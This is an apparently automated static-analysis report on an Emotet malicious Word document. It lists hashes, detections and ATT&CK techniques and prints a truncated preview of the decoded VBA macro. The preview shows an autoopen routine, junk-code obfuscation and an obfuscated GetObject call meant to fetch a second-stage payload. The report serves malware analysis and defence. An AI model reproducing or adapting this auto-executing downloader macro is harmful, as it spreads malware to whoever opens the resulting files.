Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 982ceb7f89820083…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 220.8 KB
Created: 2019-04-02 20:54:00
Authoring application: Microsoft Office Word
First seen: 2021-07-07
MD5: a2c3a9ff740aa9da024a37c4f57fe790
SHA-1: 6c9c16b7b168034ba25a3386f9676ef7eb3c8b44
SHA-256: 982ceb7f898200836f847b10d81ee7faff43d103248981b66effc3e2ddc44d54
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6922353-0', indicating it is likely part of the Emotet family. The presence of an AutoOpen VBA macro whose body calls GetObject strongly suggests the macro is designed to download and execute a second-stage payload. The obfuscated VBA code prevents a more detailed analysis of the specific download URL or execution method.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6922353-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6922353-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 32990 bytes
SHA-256: a5859d6c54b59bfee7ce9859231ff3435d6db12f4c38e1a7fb14e0d30a30e8c5

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "XAQBkA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wxwBDwZG"
Attribute VB_Base = "0{8C207F09-D45C-4354-9678-EDCE14E8D983}{6FD50A05-7658-4AFC-9909-DD91C13A5A12}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tADUBDQ"
Attribute VB_Base = "0{F8F8B0BA-8CAD-492F-9938-90329B9C2B00}{AA37439C-A046-4740-9C6D-14883CB49D95}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "icAAA4Ak"
Function iAAAAQc()
   If 968801687 = 698554612 Then
NoDXABC = NAAAAGo + Int(191902396 * Asc(lAoUXAAA) + LxZk_A _
/ 481272899) + AAoAwXAo / CLng(rXxkcoQD) - (bxAADAwA - FXcABCBx / 665876920 - Tan _
(o4ACkw) + (MUA1xAx / CSng(YCckA4oA) + _
195905500 / Sgn(693659049) * (CAUGAQ + CVar(395205126))))
End If
   If 159317864 = 784235672 Then
wxCUwQA = i_AXQAkc + Int(452685675 * Asc(n1C4AZ) + kA4ACoBc _
/ 706049415) + aA4AAwU / CLng(OAZUQQ) - (EDwA1oGA - sAwAUBcA / 431381355 - Tan _
(aDQc1GA) + (KUABADAA / CSng(wA_ZQXck) + _
507386640 / Sgn(667807939) * (GGABc_Ax + CVar(190171882))))
End If
End Function
Function DA1UcB()
   If 40728064 = 436499587 Then
cAAQA_ = ukBUUAQ + Int(770176373 * Asc(nAADkBQA) + kAoQwA _
/ 226956810) + rkAAxAZB / CLng(FDAAXG) - (YZAwZo - swA_QQGA / 284618245 - Tan _
(iAA4co) + (MGoGDAQ / CSng(c44ADkX) + _
273767340 / Sgn(35381835) * (iAko_BA + CVar(239591774))))
End If
   If 575340778 = 325960289 Then
QGUoBUAA = mBZoAw + Int(77699607 * Asc(SCxABQZB) + wUoXwA _
/ 565143498) + RAUBkc1 / CLng(lDcQCA_C) - (skDkBA - sU1AQA41 / 258948210 - Tan _
(uGAAABA) + (WAUABQ / CSng(NZAGDAA) + _
303046100 / Sgn(454669530) * (mAGXAB + CVar(411304349))))
End If
End Function
Sub autoopen()
EBAxZADo
End Sub
Function EBAxZADo()
On Error Resume Next
   If 588811461 = 547650308 Then
jBAUcAwQ = VAADAAC + Int(655053883 * Asc(bBAZQAo) + FUkBBkA _
/ 259189112) + UDDAAA / CLng(wAU_CAUA) - (GAXAAAD - PowAAA / 446357134 - Tan _
(IAA4AxA) + (jQwAUD / CSng(OxcXAQ) + _
585803329 / Sgn(633114700) * (mAAAZUAc + CVar(860891315))))
End If
   If 325402014 = 403692577 Then
iQkADUAC = wABQUAGA + Int(646286443 * Asc(MDAZxQA) + Gx1CCxAU _
/ 502262463) + PZAABAkA / CLng(AAAwA_o) - (vUDAGAA - T41AAQD / 749061529 - Tan _
(zDGoA_k) + (lQBXBAD / CSng(mcAQ1BAG) + _
51516853 / Sgn(201846791) * (tGxA41 + CVar(249964960))))
End If
   If 165370728 = 432108208 Then
j_DAA1AX = YBQxwBUQ + Int(94348623 * Asc(UBQUXCAD) + Y_AAAZAA _
/ 695744410) + kAAoAQG / CLng(hAxxwA) - (wAADZcx - LAAADUAA / 680501757 - Tan _
(aAAAZw) + (X4BoGG / CSng(p1wAAAw) + _
313752168 / Sgn(240236454) * (cC14Bw + CVar(543199086))))
End If
Set CU4QZAQA = GetObject(wxwBDwZG.VxkwACcA.Text + tADUBDQ.AQQAUDA + wxwBDwZG.VxkwACcA)
   If 704213573 = 4933024 Then
bX1AAAZA = cAxADADw + Int(916744256 * Asc(RAGAZU) + OGABAQA _
/ 488140956) + DCAQA1 / CLng(VkQUZD) - (KQADQA_ - L1A4U_A / 804734803 - Tan _
(IAAGUXX1) + (cXABADAB / CSng(W_BxQcx) + _
695976957 / Sgn(714784738) * (vAwkXUD + CVar(252985861))))
End If
   If 773105500 = 640758614 Then
k_1AoAo = pUZBGQo + Int(443403743 * Asc(Y41QZAwA) + hDAAZGU _
/ 630792612) + uQAABD4A / CLng(IDBBABUG) - (jAA_CAAG - rAAUAU / 683727527 - Tan _
(VA4AXU) + (MAAAxB1k / CSng(XDkAA1AA) + _
898090689 / Sgn(947310579) * (zXA_UUDB + CVar(608285618))))
End If
   If 862658022 = 468967744 Then
AAAAA1c = LABoAA + Int(43606693 * Asc(wAZQACZc) + wABABD_B _
/ 54797715) + v_A4xA / CLng(lGAAcQQB) - (SACkAAxG - bAwcUA / 7062242 - Tan _
(IxAUc_Dx) + (SAZADUB / CSng(MD4D_DAB) + _
443149646 / Sgn(940644877) * (bccDA1 + CVar(326396013))))

... (truncated)